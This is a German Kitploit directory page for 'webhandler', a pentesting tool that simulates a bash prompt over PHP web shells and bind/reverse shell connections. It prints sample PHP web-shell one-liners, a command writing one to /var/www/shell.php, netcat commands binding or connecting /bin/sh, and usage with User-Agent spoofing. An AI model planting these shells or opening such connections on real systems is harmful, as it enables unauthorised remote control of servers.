Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
webhandler — Bash-Simulator zur Steuerung eines Servers mithilfe von PHP-Systemfunktionen. | Kitploit
Tools/GitHubGitHub/lnxg33k/webhandler
Payload-GenerierungIDS/IPS-UmgehungWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHublnxg33k/webhandler

webhandler

Bash-Simulator zur Steuerung eines Servers mithilfe von PHP-Systemfunktionen.

Repository anzeigen
10024vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WebHandler


Ein Handler für PHP-Systemfunktionen und zugleich ein alternativer 'netcat'-Handler My image

Info


WebHandler versucht, eine 'Linux-Bash-Eingabeaufforderung' zu simulieren, um Folgendes zu handhaben und zu verarbeiten:

root@kitploit:~
- PHP-Funktionen zur Programmausführung _(z. B. `system`, `passthru`, `exec`, usw.)_
- Bind-Shell-Verbindungen
- Reverse-Shell-Verbindungen

Eine weitere Funktion besteht darin, das Feld "User-Agent" im HTTP-Header zu spoofen. (--random-angent).

Außerdem werden HTTP-Proxys unterstützt (--proxy http://<ip>:<port>)

  • WebHandler funktioniert für POST- und GET-Anfragen:

    • <?php system($_GET['cmd']); ?>
    • <?php passthru($_REQUEST['cmd']); ?>
    • <?php echo exec($_POST['cmd']); ?>
  • WebHandler ist ein Ersatz für netcat-Verbindungen.

    Ein Beispiel für eine Bind-Verbindung (z. B. nc -lvvp 1234 -e /bin/sh)

    Normalerweise würde der Benutzer Folgendes tun:

    • netcat -l -p 1234
    • nc -lvvp 1234

    Ein Beispiel für eine Reverse-Verbindung (z. B. nc 127.0.0.1 4321 -e /bin/sh)

    Normalerweise würde der Benutzer Folgendes tun:

    • netcat -l -p 4321
    • nc -lvvp 4321

Verwendung


  • --Beispieldatei:

    • echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php
  • --url ist ein erforderliches Argument beim Senden von GET- oder POST-Anfragen (z. B. eine 'webbasierte PHP'-Bind-Verbindung):

    • python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=
    • python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmd
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbo
    • python webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080
  • --listen ist ein erforderliches Argument, wenn auf eine eingehende Verbindung gewartet wird (z. B. eine 'reine' Reverse-Verbindung):

    • python webhandler.py --listen 1234

Abhängigkeiten


Wenn Ihre Python-Version < 2.7.x ist, dann ist argparse erforderlich. Um es zu installieren, führen Sie aus: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse ODER sudo pip --install argparse.

readline ist optional. Dieses Modul wird verwendet, um ausgefeilte Zeilenbearbeitungs- und Verlaufsfunktionen bereitzustellen.

git ist optional. Dies ermöglicht es, das Projekt auf dem neuesten Stand zu halten.

Links


Wiki

Bekannte Fehler

Tool herunterladen